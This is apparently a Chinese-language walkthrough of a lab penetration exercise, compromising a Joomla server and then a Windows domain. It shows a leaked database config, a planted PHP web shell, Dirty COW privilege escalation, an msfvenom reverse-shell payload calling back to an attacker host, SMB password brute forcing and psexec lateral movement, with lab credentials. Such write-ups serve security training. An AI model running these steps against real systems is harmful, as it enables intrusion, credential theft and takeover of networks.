扫描端口

开放了 80 、3306 、22 三个端口

扫描 cms

joomscan -u http://192.168.242.92/

得到的信息:

1、Joomla 3.9.12

_Joomla_是一款开源的内容管理系统(CMS),使用PHP编写,支持MySQL、MSSQL和PostgreSQL等多种数据库系统。

2、

http://192.168.242.92/administrator/components

http://192.168.242.92/administrator/modules

http://192.168.242.92/administrator/templates

http://192.168.242.92/images/banners

Interesting path found from robots.txt

http://192.168.242.92/joomla/administrator/

http://192.168.242.92/administrator/

http://192.168.242.92/bin/

http://192.168.242.92/cache/

http://192.168.242.92/cli/

http://192.168.242.92/components/

http://192.168.242.92/includes/

http://192.168.242.92/installation/

http://192.168.242.92/language/

http://192.168.242.92/layouts/

http://192.168.242.92/libraries/

http://192.168.242.92/logs/

http://192.168.242.92/modules/

http://192.168.242.92/plugins/

http://192.168.242.92/tmp/

3、数据库配置 config file path : http://192.168.242.92/configuration.php~

访问配置文件:

疑似数据库账号密码:

    public $user = 'testuser';

    public $password = 'cvcvgjASD!@';

    public $db = 'joomla';

现在可以尝试登录数据库:

查询管理员数据

替换密码为 secret

登录 web 后台:

URL:http://192.168.242.92/administrator/

Username:administrator

Password:password

注入木马

写入木马:

[http://192.168.242.92/templates/beez3/shell.php](http://192.168.242.92/templates/beez3/shell.php)

cmd

但是无法执行命令

使用蚁剑的插件绕过函数限制

成功绕过

看大佬的 WP,找到了一组账号密码:

adduser wwwuser

passwd wwwuser_123Aqx

ssh 登录

wwwuser/wwwuser_123Aqx

换命令:

ssh -o HostKeyAlgorithms=+ssh-rsa wwwuser@192.168.242.92

当前权限:

  • wwwuser (UID 500), Web 服务普通用户权限。

系统信息:

  • 系统中有 nginx 用户
  • /etc/passwd 显示系统里除了 root 之外,只有 wwwuser 是有 /bin/bash 登录权限的普通用户。

网络环境 :

  • 有三张网卡:
    • eth3: 192.168.242.92
    • eth2: 192.168.93.100
    • eth4: 10.0.2.15

提权

Linux 提权

1、内核提权(脏牛肉提权)

2、suid提权

3、sudo提权

4、数据库提权

sudo -l 查看特权命令

不能使用sudo命令

suid提权,

通过命令find / -perm -4000 2>/dev/null查看是否具有root权限的命令

内核提权

脏牛肉提权(CVE-2016-5195)

Linux脏牛(CVE-2016-5195)提权保姆级教程

脏牛-Linux内核提权 _

dirty.c内置在了kali中,使用命令**searchsploit dirty**可以搜索

低权限的用户能够在本地进行提权获取管理员权限

大概原理,Linux内核子系统在写入时产生了条件竞争。条件竞争就是程序在处理的时候异常,可能会让程序报错,这样让攻击者就有机可乘。

靶机的内核 2.6.32-431.el6.x86_64 是典型的 CentOS 6.5

在 Kali 上把代码导出来:

然后,使用 scp 上传。由于你目前是 wwwuser,建议传到有写权限的 /tmp 目录:

gcc -pthread dirty.c -o dirty -lcrypt

虽然有一些警告,但是只要编译成功就可以了

提权

./dirty 123456

这里卡住的话直接 ctrl+C 退出即可,然后验证提权成功

收集信息

上传 fscan

chmod +x fscan

./fscan -h 192.168.93.0/24

发现存活主机:

主机开放端口操作系统
192.168.93.10135、445、139、88WIN-8GA56TNV3MV
192.168.93.20135、80、1433、445、139win2008
192.168.93.30139、135、445win7
192.168.93.12080、22Linux
192.168.93.10022、80、3306、Linux

使用ssh转发打通内网(正向)

上线 msf

首先使用msf生成一个shellcode:

msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.188.104 LPORT=7890 -f elf > mshell.elf

上传

kali 监听:

靶机运行:

成功上线:

内网信息收集

内网 IP 探测

配置路由

扫描内网主机

发现存活主机:(上面已经探测过:)

主机开放端口操作系统
192.168.93.10135、445、139、88WIN-8GA56TNV3MV
192.168.93.20135、80、1433、445、139win2008
192.168.93.30139、135、445win7
192.168.93.12080、22Linux
192.168.93.10022、80、3306、Linux

爆破smb登陆密码

用 kali 自带的 /usr/share/wordlists/rockyou.txt 爆破了很久都没有成功,看师傅们的 WP 才发现根本没有那个密码。。。

administrator:123qwe!ASD

接下来使用use exploit/windows/smb/psexec模块来获取会话

使用py脚本打通内网(反向)

上传一个转发脚本到web主机

然后回到攻击机开始配置攻击模块 新开一个终端执行以下命令

回车之前先在开一个终端执行下方命令来接收会话

拿下 WIN2008

查找域控

接下来收集信息确认域控ip

shell

ipconfig /all

得到域控ip是192.168.93.10跟之前fscan扫描出来的结果一样,也开了445端口,但是密码却不是这两台主机的,所以还是依旧爆破

得到密码 zxcASDqw123!!

拿下域控

拿下ubuntu

ssh 登录

wwwuser/wwwuser_123Aqx